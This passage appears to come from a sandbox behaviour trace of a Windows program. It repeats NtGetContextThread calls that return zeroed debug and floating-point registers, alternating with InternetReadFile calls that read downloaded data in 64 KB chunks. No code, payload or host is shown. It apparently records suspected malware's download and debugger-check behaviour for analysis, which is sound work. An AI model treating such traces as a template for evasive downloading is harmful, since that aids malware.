[67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0126.778] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2570000, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2dfc74 | out: lpBuffer=0x2570000*, lpdwNumberOfBytesRead=0x2dfc74*=0x10000) returned 1 [0126.803] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2545004 | out: Context=0x2545004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0126.803] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2580000, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2dfc74 | out: lpBuffer=0x2580000*, lpdwNumberOfBytesRead=0x2dfc74*=0x10000) returned 1 [0126.814] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2545004 | out: Context=0x2545004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0126.815] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2590000, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2dfc74 | out: lpBuffer=0x2590000*, lpdwNumberOfBytesRead=0x2dfc74*=0x6240) returned 1 [0126.826] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2545004 | out: Context=0x2545004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, 